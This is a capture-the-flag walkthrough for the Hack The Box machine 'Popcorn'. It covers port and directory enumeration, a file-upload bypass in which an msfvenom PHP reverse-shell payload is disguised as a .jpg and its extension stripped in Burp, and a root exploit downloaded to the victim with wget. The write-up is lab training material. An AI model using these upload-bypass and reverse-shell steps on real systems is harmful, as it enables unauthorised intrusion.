created by ch4p \\ 10.10.10.6
// Enumeration //
Popcorn is our introduction to Webapp testing, has plenty of rabbit holes to jump down, and is Linux. So it’s basically a perfect box. Starting things off with my favorite nmap scan. While thats running, try and browse to the IP. It should resolve. Take a look around, then open another window in your terminal, and let’s start spidering.
note- a TCP connect scan on all 65,535 ports can take a minute. Feel free to use this time to read ahead, make a coffee, or just stare at nmap.
nmap -Pn -A -p- -v 10.10.10.6 -oG /home/rp/Desktop/Popcorn/nmap
dirb http://10.10.10.6
A quick word on status codes
100-199 // Information Codes
200-299 // Success Codes
300-399 // Redirection Codes
400-499 // Client Error Codes
500-599 // Server Error Codes
So all those 200 codes we see for /torrent/ should be navigable for us, let’s check it out.
We’ve got a web page with a login, and upload capabilities. We like this. This is good. At a glance, we can see there is a user ‘Admin’, who has been posting. We can note that down for later, if we need to try out some credentials. I tried just directly uploading, but it wants me to be signed in. Luckily, there’s a sign up sheet. Let’s make an account.
And easy as that, we have an account and can upload. So let’s give that a try. It wants us to upload a torrent. I’m just going to grab any old torrent file, and since Kali has some fairly convenient, I’ll use that.
Now we have the abiltity to edit this torrent, and add a screen shot for it. Let’s make a nice picture with msfvenom. It only allows the extensions for photos, so we’ll append a .jpg to the end of it.
msfvenom -p php/reverse_php LHOST=10.10.14.23 LPORT=2901 > supersafe.php.jpg
And we’ll try and upload it. We’re going to need to use Burp to intercept, and remove that .jpg extension. So we’ll get that set up as well.
I set my Burp to intercept, and submitted the screenshot, catching the request. Now we can modify it to our liking. Let’s remove the ‘.jpg’ extension, and then forward the request.
Press forward, and our form is submitted. Now we browse to /torrents/upload/ and we should see a file that matches our upload time.
Set up our listener, and we’re ready to get a shell.
I wasn’t the biggest fan of this shell, and wasn’t able to spawn a better one, so I used netcat to get a better connection.
Using python, I was able to spawn an interactive shell. Now we can enumerate.
// Privilege Escalation //
From our current shell, we’re able to get the user flag, and poke around and see if we can’t find a way to root.
Checking the user “george”s home directory reveals user.txt, our first flag. Doing a long listing also reveals a few other directories, the most interesting one here being .cache.
A quick google search turns up a promising exploit. Lets go ahead and copy it to our Desktop with searchsploit, and then serve it up on a http server with python.
On the other side, our victim machine, we’ll use wget to download the file to the /tmp directory, give it execute permissions, and attempt to run it.
There error you see on the last line indicates there are Windows carriage return characters in the file. Luckily, it’s a simple fix. Run the command below, and then execute the file again.
sed -i -e 's/\r$//' 14339.sh
Enter the password ‘toor’ when prompted, and you have root. That easy. And last but not least, here’s our flag.